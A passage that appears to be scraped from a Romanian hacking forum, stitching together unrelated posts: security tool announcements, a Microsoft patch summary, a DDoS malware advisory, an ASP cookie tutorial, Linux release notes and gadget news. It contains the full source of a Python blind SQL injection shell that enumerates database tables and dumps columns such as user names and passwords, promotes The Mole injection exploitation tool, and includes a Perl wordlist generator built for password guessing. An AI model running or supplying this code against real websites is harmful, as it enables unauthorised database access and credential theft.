Fi8sVrs

cauta inainte sa postezi: https://rstcenter.com/forum/22562-decodare-nokia-2730-classic.rst

#!/usr/bin/env python ''' Blind SQL injection Python shell BSIShell is a simple python script that permits blind SQL injection. by Rodrigo Marcos ''' import urllib2 import urllib import string import sys TRUE_CONDITION = '1=1' # substring((select 'a'),1,1)='a' FALSE_CONDITION = '1=2' # substring((select 'a'),1,1)='b' MAX_LENGTH = 256 MAX_NUM = 1024 pre = '' post = '' result_true = '' result_false = '' ready = 0 def check(): global ready if ready: return 1 else: prepare() return ready def prepare(): global result_true global result_false global ready if pre == '': print '[+] Error: at least "pre" parameter has to be set' ready = 0 return print '[+] Learning true/false results' result_true = dorequest(TRUE_CONDITION) result_false = dorequest(FALSE_CONDITION) #print result_true #print result_false if result_true == result_false: print '[+] Error: I could not identify true/false conditions. The following requests returned the same data:' print '\t - ' + pre + TRUE_CONDITION + post print '\t - ' + pre + FALSE_CONDITION + post #sys.exit(0) ready = 0 return else: print '[+] Retrieved true/false conditions. Ready to start.' ready = 1 return def dorequest(sql): #this function makes a request and returns the response request = pre + sql + post #print request request = string.replace(request, ' ', '%20') req = urllib2.Request(request) #req.add_header('Host', '172.30.3.230') #req.add_header('Cookie', 'JSESSIONID=8D6286F331B4614B7B60680FDA913112; marathon=ok') try: r = urllib2.urlopen(req) except urllib2.URLError, msg: print "[+] Error: Error requesting URL (%s)" % msg return r.read() def getspace(sqlrequest, position): #This function detects if the the item is a lowercase/uppercase character or a number #return range(32,127) upper = 0 lower = 0 number = 0 request = "ASCII(UPPER(SUBSTRING((" + sqlrequest + "), " + str(position) + ", 1)))= ASCII(SUBSTRING((" + sqlrequest + "), " + str(position) + ', 1))' if dorequest(request)==result_true: upper = 1 request = "ASCII(LOWER(SUBSTRING((" + sqlrequest + "), " + str(position) + ", 1)))= ASCII(SUBSTRING((" + sqlrequest + "), " + str(position) + ', 1))' if dorequest(request)==result_true: lower = 1 if upper and lower: #if upper and lower are true, that means that it is a number or a symbol return range(32, 65) + range(91,97) + range(123,127) elif upper: return range(65,91) else: return range(97,123) def detectend(sqlrequest, position): #this function will detect if the request returns a null request = "ASCII(SUBSTRING((" + sqlrequest + "), " + str(position) + ", 1)) IS NULL" if dorequest(request)==result_true: return 1 else: return 0 def getvalue(sqlquery, position, space): #this function searchs a certain position and get they result #We first perform some approximation while len(space)>8: space = approximate(sqlquery, position, space) #We now continue bruteforcing the remaining space for letter in space: request = "ASCII(SUBSTRING((" + sqlquery + "), " + str(position) + ', 1))=' + str(letter) if dorequest(request)==result_true: return chr(letter) return '.' def approximate(sqlquery, position, space): middle = len(space)/2 request = "ASCII(SUBSTRING((" + sqlquery + "), " + str(position) + ', 1))>=' + str(space[middle]) #print request if dorequest(request)==result_true: return space[middle:] # second half else: return space[:middle] # first half ########################################################################################################## # Low level functions ########################################################################################################## def getnumericvalue(sqlquery): if not check(): return for num in range(0,MAX_NUM): request = '(' + sqlquery + ")=" + str(num) if dorequest(request)==result_true: #print str(num) return num def getstringvalue(sqlquery, show=0, slen = MAX_LENGTH): if not check(): return result = '' for position in range(1,slen+1): if detectend(sqlquery, position): break letter = getvalue(sqlquery, position, getspace(sqlquery, position)) if show: print letter, result += letter return result ########################################################################################################## # High level functions ########################################################################################################## def table_enumeration(): if not check(): return #table enumeration print '[+] Starting table enumeration' sqlquery = 'SELECT COUNT(name) FROM sysobjects WHERE xtype=char(85)' n_tables = getnumericvalue(sqlquery) print '\t [+] Number of tables detected: ' + str(n_tables) tableid = '0' for tablecounter in range(1,n_tables+1): print '\t\t [+] Table ' + str(tablecounter) + ':' sqlquery = 'SELECT cast(MIN(id) as varchar) FROM sysobjects WHERE xtype=char(85) and id>' + tableid tableid = string.replace(getstringvalue(sqlquery), ' ', '') print '\t\t\t ID: ' + tableid #sqlquery = 'select TOP 1 LEN(name) from sysobjects where id=' + tableid + ' AND xtype=char(85)' #bi.getnumericvalue(sqlquery) sqlquery = 'select name from sysobjects where id=' + tableid tablename = string.replace(getstringvalue(sqlquery), ' ', '') print '\t\t\t Name: ' + tablename sqlquery = 'SELECT COUNT(*) FROM ' + tablename nrows = getnumericvalue(sqlquery) print '\t\t\t # Rows: ' + str(nrows) sqlquery = 'SELECT COUNT(name) FROM syscolumns WHERE id=' + tableid ncols = getnumericvalue(sqlquery) print '\t\t\t # Cols: ' + str(ncols) # Column enumeration colid = 0 for colcounter in range(1, ncols+1): sqlquery = 'SELECT MIN(colid) FROM syscolumns WHERE colid > ' + str(colid) + ' AND id=' + tableid colid = getnumericvalue(sqlquery) sqlquery = 'SELECT name FROM syscolumns where id=' + tableid + ' AND colid=' + str(colid) col = getstringvalue(sqlquery) print '\t\t\t\t - ' + col def table_content(table, colid, columns): if not check(): return print '[+] Starting table content retrieval' print '\t [+] Table: ' + table print '\t [+] Column ID: ' + colid print '\t [+] Target Cols: ' + str(columns) sqlquery = 'SELECT COUNT(' + colid + ') FROM ' + table nrows = getnumericvalue(sqlquery) print '\t\t\t # Rows: ' + str(nrows) if nrows>0: sqlquery = 'SELECT MIN(' + colid + ') FROM ' + table mincolid = getnumericvalue(sqlquery) - 1 for rowcounter in range(1, nrows + 1): sqlquery = 'SELECT MIN(' + colid + ') FROM ' + table + ' WHERE ' + colid + ' > ' + str(mincolid) mincolid = getnumericvalue(sqlquery) result = '\t\t\t\t' + str(mincolid) + '.- ' for column in columns: sqlquery = 'SELECT ' + column + ' FROM ' + table + ' WHERE ' + colid + ' = ' + str(mincolid) col = getstringvalue(sqlquery) result += ' \t ' + col print result def version(): if not check(): return print '[+] Starting version retrieval' print '[+] As this takes a while, results will be shown as they are discovered' sqlquery = 'select @@version' result = getstringvalue(sqlquery, 1) print print result def user(): if not check(): return print '[+] Starting user retrieval' #For some reason, we need to detect length first as it doesn't respond with nulls sqlquery = 'select LEN(a.loginame) from master..sysprocesses as a where a.spid=@@SPID' userlen = getnumericvalue(sqlquery) sqlquery = 'select a.loginame from master..sysprocesses as a where a.spid=@@SPID' loginname = getstringvalue(sqlquery,0,userlen) sqlquery = 'select LEN(user)' userlen = getnumericvalue(sqlquery) sqlquery = 'select user' user = getstringvalue(sqlquery,0,userlen) print '[+] User: ' + loginname + ' (' + user + ')' def help(): print ''' Blind SQL Injection Shell Preparation: - Set the pre and post parameters eg. pre = "http://vulnerable/id=1' and " eg. post = " or '1'='2" High Level Functions: - user() - Displays the database user - version() - Displays the version of the database server - table_enumeration() - Displays database structure - table_content(table, id_column, colummns) - Displays the content on the database eg. table_content('users', 'id', ['name', 'password']) Low Level Functions: - getnumericvalue(sqlquery) - Returns a numeric value from the database eg. getnumericvalue('select LEN(user)') - getstringvalue(sqlquery, [verbose],[length]) - Returns a string value from the database eg. getstringvalue('select @@version') Others: - help() - This help output - quit() - Quit ''' def quit(): sys.exit(0) ########################################################################################################## # Main ########################################################################################################## if __name__ == '__main__': import code banner = 'Blind SQL injection shell' code.interact(banner=banner, local=globals()) mirror source: secforce.com

Despre Scoala Discovery Scoala Discovery este un proiect realizat de Discovery Networks, compania care detine posturile Discovery Channel, Animal Planet sau Discovery Science, in colaborare cu Ministerul Educatiei, Cercetarii, Tineretului si Sportului din Romania. Cum vom face asta? Incepand cu 16 ianuarie 2012, punem la dispozitia elevilor si a profesorilor doua resurse de care acestia se pot folosi oricand pentru a intelege mai bine fenomenele stiintifice si pentru a face lectiile la clasa mai atractive: Televiziune: Discovery Channel Romania va difuza o serie de programe educative in fiecare zi, de luni pana vineri la ora 14.00 si apoi in reluare - initial a doua zi, de la ora 08.00, apoi in cadrul unui bloc de programe dedicat, sambata si duminica. Programele prezinta subiecte stiintifice, de la chimie si matematica, fizica, biologie si ecologie pana la inventii. Acestea au fost special selectate pentru a-i ajuta pe elevii claselor V - XII sa inteleaga mai bine fenomenele stiintifice, transmitand mesajul ca stiinta este un domeniu interesant si captivant. Programele vor fi dublate in limba romana, fara a avea pauze publicitare. Internet: scoala.discovery.ro este un portal dedicat profesorilor, care pot descarca aici materiale-suport ce pot fi folosite la clasa, cu elevii. Site-ul include o grila de programe si un Ghid pentru profesori complet, despre fiecare episod, prezentand obiectivele lectiei, seturi de intrebari care sa ii apropie pe elevi de continut, propuneri de activitati in clasa si definitii pentru termenii de vocabular. Pentru mai multe detalii despre programe consultati sectiunea Emisiuni, iar pentru a descarca Ghidul profesorului intrati in sectiunea Pagina profesorului. Scoala Discovery src: tv

This month’s patch batch contains 7 new Microsoft Security Bulletins. MS12-001 Windows Kernel SafeSEH Bypass Vulnerability MS12-001 Introduces a new “Security Impact” type to the Microsoft Bulletins, “Security Feature Bypass”. This issue is a bypass of the SafeSEH setting on software compiled with Microsoft Visual C++ .NET 2003. In order to make use of it, there must also be a vulnerability in your compiled software. The bypass exists within Windows, and compiled software will not need to be recompiled. MS12-002 Object Packager Insecure Executable Launching Vulnerability MS12-002 Similar to the DLL preloading attack, except with Executables rather than DLLs, which means SafeDllSearchMode cannot help mitigate this issue. The issue applies to Microsoft Publisher (.PUB) files, where an attacker could place a malicious file in the same directory as a .PUB file. MS12-003 CSRSS Elevation of Privilege Vulnerability MS12-003 Affects the Windows Client Server Runtime Subsystem (CSRSS) on double-byte (Unicode) locale (such as Chinese, Japanese, or Korean system locales). Keep in mind that the locale on any system can be changed, so this patch should be applied regardless of the current locale. MS12-004 DirectShow Remote Code Execution Vulnerability MS12-004 This patch contains two fixes for all except Windows 7 systems. One for DirectShow. MIDI Remote Code Execution Vulnerability One for the Windows Multimedia Library. This is the only critical patch for the month, providing a potential drive-by vector related to MIDI files. MS12-005 Assembly Execution Vulnerability MS12-005 This patch fixes an issue related to malicious EXEs deployed as a ClickOnce application and embedded within Office Documents. MS12-006 SSL and TLS Protocols Vulnerability MS12-006 This patch fixes the well known “BEAST” vulnerability. Apply this patch as soon as possible. MS12-007 AntiXSS Library Bypass Vulnerability MS12-007 This patch resolves a bypass in the Microsoft AntiXSS Library similar to MS12-001. Although this should be in the new “Security Feature Bypass” category, the impact is considered Information Disclosure. Again when combined with a flaw in the website that lies behind the AntiXSS library, this vulnerability could be dangerous. As always, these patches should be tested and implemented as quickly as possible. VIA: https://kohi10.wordpress.com/2012/01/10/january-2012-microsoft-patches/

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.Arachni is smart, it trains itself by learning from the HTTP responses it receives during the audit process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify false-positives. This version includes lots of goodies, including: A new light-weight RPC implementation (No more XMLRPC) High Performance Grid (HPG) — Combines the resources of multiple nodes for lightning-fast scans Updated WebUI to provide access to HPG features and context-sensitive help Accuracy improvements and bugfixes for the XSS, SQL Injection and Path Traversal modules New report formats (JSON, Marshal, YAML) Cygwin package for Windows New plugins ReScan — It uses the AFR report of a previous scan to extract the sitemap in order to avoid a redundant crawl. BeepNotify — Beeps when the scan finishes. LibNotify — Uses the libnotify library to send notifications for each discovered issue and a summary at the end of the scan. EmailNotify — Sends a notification (and optionally a report) over SMTP at the end of the scan. Manual verification — Flags issues that require manual verification as untrusted in order to reduce the signal-to-noise ratio. Resolver — Resolves vulnerable hostnames to IP addresses. Windows download link: http://downloads.segfault.gr/arachni/arachni-v0.4.0.2-cygwin.exe Linux download link: https://github.com/Zapotek/arachni/downloads/arachni-v0.4.0.2-cde.tar.gz Read more: News :: Arachni - Web Application Security Scanner Framework via: Security-Shell: Arachni v.0.4 Released

si sterge cookie-urile edit: nu ai postat in sectiunea potrivita

Instant documentation search [ CSS | HTML | JavaScript | DOM | jQuery | PHP ] Link Source

Browsershots tests your website's compatability on different browsers by taking screenshots of your web pages rendered by real browsers on different operating systems. Link Source

http://uploadimage.ro/images/06871873589185815933.jpg pass: rstcenter

in windows cu python 2.7 functioneaza si *.jpg +rep

Gentoo Linux is proud to announce the availability of a new LiveDVD to celebrate the continued collaboration between Gentoo users and developers. The LiveDVD features a superb list of packages, some of which are listed below. A special thanks to the Gentoo Infrastructure Team. Their hard work behind the scenes provide the resources, services and technology necessary to support the Gentoo Linux project. Packages included in this release: Linux Kernel 3.1.5, Xorg 1.10.4, KDE 4.7.4, Gnome 3.2.1 XFCE 4.8, Fluxbox 1.3.2 Firefox 9.0, LibreOffice 3.4.99.2, Gimp 2.6.11, Blender 2.60, Amarok 2.5 , VLC 1.1.13, Chromium 16.0 and much more ... If you want to see if your package is included we have generated both the x86 package list, and amd64 package list. You may also be interested in checking out the FAQ or the updated artwork plus dvd cases and covers for the 12.0 release. Special Features: Writable file systems using AUFS so you can emerge new packages! Persistence for $HOME is available; press F9 for more info! The LiveDVD is available in two flavors: a hybrid x86/x86_64 version, and an x86_64 multi lib version. The livedvd-x86-amd64-32ul-11.2 version will work on 32-bit x86 or 64-bit x86_64. If your CPU architecture is x86, then boot with the default gentoo kernel. If your arch is amd64, boot with the gentoo64 kernel. This means you can boot a 64-bit kernel and install a customized 64-bit user land while using the provided 32-bit user land. The livedvd-amd64-multilib-11.2 version is for x86_64 only. If you are ready to check it out, let our bouncer direct you to the closest x86 image or amd64 image file. If you would prefer to take it easy on the bandwidth and help the community, torrents are also provided. Gentoo Linux -- Gentoo Linux releases 12.0 LiveDVD

glTail is a tool for realtime log visualisation, which according to the website allows you to “view real-time data and statistics from any logfile on any server with SSH, in an intuitive and entertaining way.” glTail can read from any text logfile you like, and via a set of parsers can extract information such as IP addresses for graphical display. Each row from the logfile may trigger several blobs, e.g. source IP, dest IP, etc, as you can see in the video below: I’ve written some parsers for Snort, net-entropy and viewssld. A screenshot of them all in action is shown below (click here for full size view): The red blobs are related to Snort, cyan ones to net-entropy, and the yellow shades are from viewssld. The numeric columns show the rate at which each item is appearing, and the length of the coloured highlight bars show the proportion of occurences of a given item relative to the others. The parser files and a sample config.yaml file that uses them can be found here (snort.rb, net-entropy.rb, viewssld.rb and config.yaml). Useful? So, it’s a pretty visualisation of interesting stuff, but is it useful and actionable? It’s certainly hopeless for correlation – when a signature fires, it’s more or less impossible to tell the associated IP addresses and ports even if you have a very quiet sensor. At the other end of the scale, if you’re inundated with blobs you can alter the regexes in snort.rb to match on a specific IP/protocol/signature etc to be a little more selective. Where I think this may prove most useful is when you’re learning from an incident. If you’ve investigated an incident where someone compromised your webserver, you could pull all the relevant log entries that show: Snort alerts (when the attacker was probing for vulnerabilities) Apache/IIS log entries (showing everything else they did to your server) net-entropy logs (showing the attacker’s outbound backdoor SSH tunnel). If you were to pump all of these logs through gltail you’d have an effective visualisation of the attack. For inspiration, check this out: Download Source

Dirt Jumper is a prepackaged toolkit that has evolved from the Russkill strain of malware HOLLYWOOD, FL — (December 29, 2011) — Prolexic Technologies, the global leader in Distributed Denial of Service (DDoS) mitigation services, today announced it has issued a threat advisory for Dirt Jumper, a high-risk DDoS toolkit that can be used to launch application layer attacks on web sites. Prolexic has also developed a security-scanning tool that can be used to detect Dirt Jumper command and control servers. The threat advisory and scanner can be downloaded free of charge from dirtdozer Prolexic. Dirt Jumper is a prepackaged toolkit that has evolved from the Russkill strain of malware. It is now widely available on various underground websites and retails for as little as US$150. Dirt Jumper can be spread via spam, exploit kits, fake downloads and can be pushed out to machines already infected with other forms of malware. “The Dirt Jumper DDoS toolkit is currently one of the most aggressive malware strains used by DDoS attackers globally,” said Neal Quinn, vice president of operations at Prolexic. “Increasingly, we are seeing this tool used against clients worldwide and it is likely to become more widespread and effective as distribution spreads.” After analyzing the Dirt Jumper v3 DDoS Toolkit, the Prolexic Security Engineering and Response Team (PLXSERT) categorized it as a high-risk threat. The Prolexic team identified the newest variant, known as Dirt Jumper September and uncovered that it had updated functionalities as well as an enhanced control panel, which makes it simple for attackers to use. Prolexic’s Dirt Jumper Threat Advisory provides an analysis of the payload and also gives a detailed breakdown of attack signatures by attack type, as well as information on remediation and recommended mitigation strategies. PLXSERT has also written a custom-scanning tool called Dirt Dozer (dirtdozer.py) that enables security research teams and engineers to validate if any suspected HTTP command and control servers utilize any strains of the malware. As a public service to business enterprises and organizations worldwide, Prolexic’s Dirt Dozer scanner is being made available free of charge and can be downloaded from dirtdozer Prolexic. Prolexic Threat Advisories Prolexic recently launched a service that provides its subscribers with regular Threat Advisories. Compiled by the Prolexic Security Engineering and Response Team (PLXSERT), on-going advisories will help subscribers stay informed and vigilant so they can make better, proactive decisions. Designed to provide early warnings of new or modified DDoS attack signatures and scripts recently observed by PLXSERT, each Threat Advisory contains a detailed description of the type of attack, a list of attack signatures, and the specific network infrastructure or application that it targets. In addition, Prolexic’s DDoS mitigation experts also offer insight into the nature of each type of attack, as well as provide specific warnings as to how the attack will affect businesses and enterprises of different sizes and infrastructures. PLXSERT also provides threat remediation tips to help subscribers not only recognize the new attack signatures, but also proactively defend against them. “The more our subscribers understand about DDoS attacks, the more they will be able to make informed decisions about DDoS protection and mitigation strategies,” said Paul Sop, chief technology officer at Prolexic. “As the industry’s premium provider, Prolexic is ideally positioned to provide this unique level of insight and intelligence to our customers.” New Threat Advisories will be distributed to subscribers via email and will also be posted on the Prolexic Portal, a password protected, subscriber-only resource. About the Prolexic Security Engineering & Response Team (PLXSERT) PLXSERT monitors malicious cyber threats globally and analyzes DDoS attacks using proprietary techniques and equipment. Through data forensics and post attack analysis, PLXSERT is able to build a global view of DDoS attacks, which is shared with customers. By identifying the sources and associated attributes of individual attacks, the PLXSERT team helps organizations adopt best practices and make more informed, proactive decisions about DDoS threats. About Prolexic Prolexic is the world’s largest, most trusted Distributed Denial of Service (DDoS) mitigation provider. Able to absorb the largest and most complex attacks ever launched, Prolexic restores mission critical Internet facing infrastructures for global enterprises and government agencies within minutes. Six of the world’s ten largest banks and the leading companies in e-Commerce, payment processing, travel/hospitality, gaming and other at-risk industries rely on Prolexic to protect their businesses. Founded in 2003 as the world’s first “in the cloud” DDoS mitigation platform, Prolexic is headquartered in Hollywood, Florida and has scrubbing centers located in the Americas, Europe and Asia. For more information, visit Prolexic. Source

What is Lockbin? Lockbin is a web application for sending private email messages and files. It's free! People use it to send things like credit card numbers or confidential information. Why can't I just use email? Lockbin ends message persistence, which means your email message will not be backed up on email servers or stored in backup files. Network sniffers can also spy on your email traffic while in transit. Use Lockbin to obscure the content of your message and avoid these hazards to your privacy. How does it work? No registration is required to use Lockbin. Your message and file attachments are protected by strong AES-256 bit encryption and your secret password. You invent the password and deliver it to the recipient using a phone, text message, instant message, homing pigeon, but not email. URL: Lockbin - send private, secure email messages, easily

What does Geosense do? Geosense is a Windows Sensor that provides the Location and Sensors platform in Windows 7 with accurate and reasonably ubiquitous positioning information without requiring or the assistance of GPS hardware, enabling more practical location-based applications and scenarios on Windows 7. Although not required, it works best on computers with a WiFi adapter. How does it work? We employ thousands of pigeons around the world to stalk our users with the promise of breadcrumbs. No, seriously, Geosense is designed to use a hybrid mix of geolocation service providers and geolocation methods to pinpoint the most accurate location information possible - including but not limited to WiFi triangulation, cell tower triangulation and IP lookup. Download 32-bit 64-bit

cdecl - C gibberish ? English cdecl is a program for encoding and decoding C or C++ type declarations. It can convert your c programming code sentence to English and vice versa. Example: If we type "declare arr as array 20 of int" it will convert into C declarations such as "int arr[20]" It can also translate the C into the pseudo English. And it handles typecasts too. And in this version it has command line editing and history with the GNU read line library. It is a gem for any C programmer who has ever scratched their head wondering what a complex statement like "int (*(*foo)(void ))[3]" or "declare bar as volatile pointer to array 64 of const int". Cdecl Documentation Source Code Author: ridiculous_fish Source

What is a Cookie? A cookie is often used to identify a user. A cookie is a small file that the server embeds on the user's computer. Each time the same computer requests a page with a browser, it will send the cookie too. With ASP, you can both create and retrieve cookie values. How to Create a Cookie? The "Response.Cookies" command is used to create cookies. Note: The Response.Cookies command must appear BEFORE the <html> tag. In the example below, we will create a cookie named "firstname" and assign the value "Alex" to it: <% Response.Cookies("firstname")="Alex" %> It is also possible to assign properties to a cookie, like setting a date when the cookie should expire: <% Response.Cookies("firstname")="Alex" Response.Cookies("firstname").Expires=#May 10,2012# %> How to Retrieve a Cookie Value? The "Request.Cookies" command is used to retrieve a cookie value. In the example below, we retrieve the value of the cookie named "firstname" and display it on a page: <% fname=Request.Cookies("firstname") response.write("Firstname=" & fname) %> Output: Firstname=Alex A Cookie with Keys If a cookie contains a collection of multiple values, we say that the cookie has Keys. In the example below, we will create a cookie collection named "user". The "user" cookie has Keys that contains information about a user: <% Response.Cookies("user")("firstname")="John" Response.Cookies("user")("lastname")="Smith" Response.Cookies("user")("country")="Norway" Response.Cookies("user")("age")="25" %> Read all Cookies Look at the following code: <% Response.Cookies("firstname")="Alex" Response.Cookies("user")("firstname")="John" Response.Cookies("user")("lastname")="Smith" Response.Cookies("user")("country")="Norway" Response.Cookies("user")("age")="25" %> Assume that your server has sent all the cookies above to a user. Now we want to read all the cookies sent to a user. The example below shows how to do it (note that the code below checks if a cookie has Keys with the HasKeys property): <html> <body> <% dim x,y for each x in Request.Cookies response.write("<p>") if Request.Cookies(x).HasKeys then for each y in Request.Cookies(x) response.write(x & ":" & y & "=" & Request.Cookies(x)(y)) response.write("<br />") next else Response.Write(x & "=" & Request.Cookies(x) & "<br />") end if response.write "</p>" next %> </body> </html> Output: firstname=Alex user:firstname=John user:lastname=Smith user:country=Norway user:age=25 What if a Browser Does NOT Support Cookies? If your application deals with browsers that do not support cookies, you will have to use other methods to pass information from one page to another in your application. There are two ways of doing this: 1. Add parameters to a URL You can add parameters to a URL: <a href="welcome.asp?fname=John&lname=Smith">Go to Welcome Page</a> And retrieve the values in the "welcome.asp" file like this: <% fname=Request.querystring("fname") lname=Request.querystring("lname") response.write("<p>Hello " & fname & " " & lname & "!</p>") response.write("<p>Welcome to my Web site!</p>") %> 2. Use a form You can use a form. The form passes the user input to "welcome.asp" when the user clicks on the Submit button: <form method="post" action="welcome.asp"> First Name: <input type="text" name="fname" value="" /> Last Name: <input type="text" name="lname" value="" /> <input type="submit" value="Submit" /> </form> Retrieve the values in the "welcome.asp" file like this: <% fname=Request.form("fname") lname=Request.form("lname") response.write("<p>Hello " & fname & " " & lname & "!</p>") response.write("<p>Welcome to my Web site!</p>") %> Source w3schools.com/ASP/asp_cookies.asp

sunt o multime de categorii in aceasta materie, care mai exact?

Presents operating systems Ubuntu, Kubuntu, and Xubuntu 11.10 OEM for i386 and amd64 Oriented system for suppliers of computer equipment (OEM-Preinstallation for new computer equipment: computers, laptops, tablets) and for simple installation. All versions of the updated and do not require additional installation after downloading from the Internet: • full support for Russian, Ukrainian and English languages; • enhanced support for multimedia (audio and video files of different formats, such as: avi, divX, mp3, mp4, amr, Adobe Flash and many other formats); • support for additional types of archives (RAR, ACE, ARJ and others); • packages for the Windows-network. The system Ubuntu OEM, in addition to the standard interface Unity, included three interfaces Gnome (Gnome-Shell and Gnome-Classic), as well as the package manager Synaptic. Systems updated in December 2011. Ingredients listed corresponds to the original versions of the applications and did not change. To learn more and download here

numai functioneaza metoda, au reparat bug-ul

Puzzle and security freaks will love the new Crypteks physically lockable USB device. The USB storage is located inside a housing with five rings on the outside, each set with the 26 letters of the alphabet. Twist to your code and you've unlocked your USB. With 26 letters and five rings, you'll have whopping 14,348,907 possible passwords. Now that's security! If all of this sounds familiar, you're right. The Crypteks was inspired by the "cryptex" device featured in The Da Vinci Code. A cryptex is a locking device using cryptography — a complex combination of numbers or letters — to protect an item inside. After using your combination to unlock the device and release your USB, you can remove the outer rings and reset your passcode by placing them back with a new code set between red dots as a guide. You can even send the device back to the maker if you forget your code. Somehow though, we think you're the type that will remember. If the high level of mechanical encryption isn't enough security for those worried about their sensitive data, the USB also offers 256-bit AES hardware encryption — also with a password. But be warned — this one can't be reset. Every detail has been thought of — the solid-aluminum alloy design has an anodized layer to ward off fingerprints and dust. The USB tip is also retractable. It's available in 4, 8 and 16 GB capacities, and 24 MB/s read and 10 MB/s write speeds. The Crypteks got its start via Kickstarter, and enough backing has been raised for production so these drives should ship for the holidays. Lockable USB drive gets physical with digital security | DVICE

The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique. Features Support for injections using Mysql, SQL Server, Postgres and Oracle databases. Command line interface. Different commands trigger different actions. Auto-completion for commands, command arguments and database, table and columns names. Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily. Developed in python 3. Screenshots Downloads Current Release: v0.2.6 (2011-11-25) Windows 32bit executable: themole-0.2.6-win32.zip Tarball-gzipped format: themole-0.2.6-lin-src.tar.gz Zip format: themole-0.2.6-win-src.zip Tutorial: Tutorial | The Mole Source: darknet.org.uk

Description: Script to create one sorted and unique wordlist from multiple wordlists. It takes as input N raw text files, a directory of them, or both. It parses the input and filters by string length on min and max specified. It will then sort all the data and make it unique for final output. L33t Speak is an option, see usage statement in prog. Features: L33t Speak Supports mix of standard text with L33t Speak Support for individual files, directory of files or both Filters output to size mandated by user Ensures uniqueness of output data Sorts output #!/usr/bin/perl # Script to create one sorted and unique wordlist from multiple wordlists. # It takes as input N raw text files, a directory of them, or both. # It parses the input and filters by string length on min and max specified. # It will then sort all the data and make it unique for final output. # L33t Speak is an option, see usage statement below. # # Author: Andres Andreu <andres [at] neurofuzz dot com> # File: generateDictionary.pl # Ver: 1.0 # Usage: perl generateDictionary.pl -file TEXT_FILE_1 -file TEXT_FILE_2 ... -file TEXT_FILE_N | -txtdir DIR_WHERE_FILES_ARE # -min MIN_WORD_LENGTH -max MAX_WORD_LENGTH -out OUTPUT_FILE # [-l33t [1 | 5 | 7 | 9]] [-mix 1] # use strict; use Getopt::Long; my ($min, $max, $fout, $txt_dir, $use_dir, $counter, $fcounter, $raw_dict, $key, $var, %count, $use_l33t, $l33t_val, $use_mix, $LEVEL); $counter = $fcounter = $use_mix = 0; my @rawfiles = (); $LEVEL = 5; Getopt::Long::Configure ("permute"); ############################################################################### # taken from Lingua::31337 by Casey West # C4S3y R. WES7 <C4SeY@g33KN3S7.c0m> my %CONVERSIONS = ( # handle the vowels 1 => { mixcase => 0, chars => { a => 4, e => 3, i => 1, o => 0, }, }, # Handle vowels and some consonants, # don't use punctuation in the translation, # shift case at random. 5 => { mixcase => 1, chars => { a => 4, e => 3, f => 'ph', i => 1, l => 1, o => 0, 's$' => 'z', t => 7, }, }, # Handle vowels and most consonants, # use punctuation in the translation, # shift case at random, # convert some letters. 7 => { mixcase => 1, chars => { a => 4, b => '|3', d => '|)', e => 3, f => 'ph', h => '|-|', i => 1, k => '|<', l => 1, 'm' => '|\/|', n => '|\|', o => 0, 's$' => 'z', t => '-|-', v => '\/', w => '\/\/', x => '><', }, }, # Handle vowels and most consonants, # use punctuation in the translation, # shift case at random, # convert some letters to others, # decide between several options. 9 => { mixcase => 1, chars => { a => [ 4, 'aw' ], b => '|3', ck => 'x', 'ck$' => 'x0rz', d => '|)', e => [ 3, 0, 'o' ], 'ed$' => 'z0r3d', 'er$' => '0r', f => 'ph', h => '|-|', i => 1, k => '|<', l => 1, 'm' => '|\/|', n => '|\|', o => 0, 's' => 'z', t => '-|-', v => '\/', w => '\/\/', x => '><', }, }, ); sub text231337 { my @text = @_; my @new_text = (); $LEVEL-- until exists $CONVERSIONS{$LEVEL}; foreach my $line ( @text ) { foreach ( keys %{$CONVERSIONS{$LEVEL}->{chars}} ) { if ( ref $CONVERSIONS{$LEVEL}->{chars}->{$_} ) { $line =~ s/($_)/(0,1)[rand 2] ? @{$CONVERSIONS{$LEVEL}->{chars}{$_}}[rand $#{$CONVERSIONS{$LEVEL}->{chars}{$_}}] : $1/egi; } else { $line =~ s/($_)/(0,1)[rand 2] ? $CONVERSIONS{$LEVEL}->{chars}{$_} : $1/egi; } } $line =~ s/([A-Z])/(0,1)[rand 2] ? uc($1) : lc($1)/egi if $CONVERSIONS{$LEVEL}->{mixcase}; push @new_text, $line; } return @new_text; } # End of module Lingua::31337 usage ############################################################################### sub usage(){ print "\nUsage: perl generateDictionary.pl -file TEXT_FILE_1 -file TEXT_FILE_2 ... -file TEXT_FILE_N | -txtdir DIR_WHERE_FILES_ARE " . "-min MIN_WORD_LENGTH -max MAX_WORD_LENGTH [-l33t [1 | 5 | 7 | 9]] [-mix 1] " . "-out OUTPUT_FILE\n\n" . "-min & -max establish the string length range you want your data filtered on\n" . "-out sets the resource for final data output\n" . "-file sets individual files to feed the final dictionary (enter as many as you like)" . "[-txtdir] the path to a directory where some source dictionary files exist\n" . "[-l33t] sets on the option to use L33t Speak translation, valid values are 1,5,7,9\n" . "[-mix] sets on the option to use both L33T Speak and clear text strings simultaneously\n" . "when the \"-mix\" switch is used, the \"-l33t\" switch MUST also be used\n\n"; exit(); } #Define initial hash my %opts=(); GetOptions(\%opts,"min=i", "max=i", "file=s" => \@rawfiles, "txtdir=s", "l33t=s", "mix=s", "out=s"); #Display Usage if no options were passed if(keys(%opts)==0) { usage(); } #Process the options if (defined($opts{min})) { $min = $opts{min}; } if (defined($opts{max})) { $max = $opts{max}; } if (defined($opts{file})) { push(@rawfiles, $opts{file}); } if (defined($opts{txtdir})) { $txt_dir = $opts{txtdir}; $use_dir = 1; } if (defined($opts{l33t})) { $l33t_val = $opts{l33t}; $use_l33t = 1; } if (defined($opts{mix})) { $use_mix = 1; } if (defined($opts{out})) { $fout = $opts{out}; } #Handle conditions if ((!$min) || (!$max) || (!$fout)) { usage(); } if ((!@rawfiles) && (!$txt_dir)) { usage(); } if (($use_mix) && (!$use_l33t)) { print "If you want to use the \"mix\" mode for both normal strings " . "and L33t Speak combined, then you must use the \"-l33t\" switch \n\n"; usage(); } if ($use_l33t) { if (($l33t_val != 1) && ($l33t_val != 5) && ($l33t_val != 7) && ($l33t_val != 9)) { print "The only acceptable values for the L33t Speak option are " . "1 | 5 | 7 | 9 \n\n"; usage(); } $LEVEL = $l33t_val; } open( FINALDICT, ">$fout") or die "Can't open output file $fout..."; 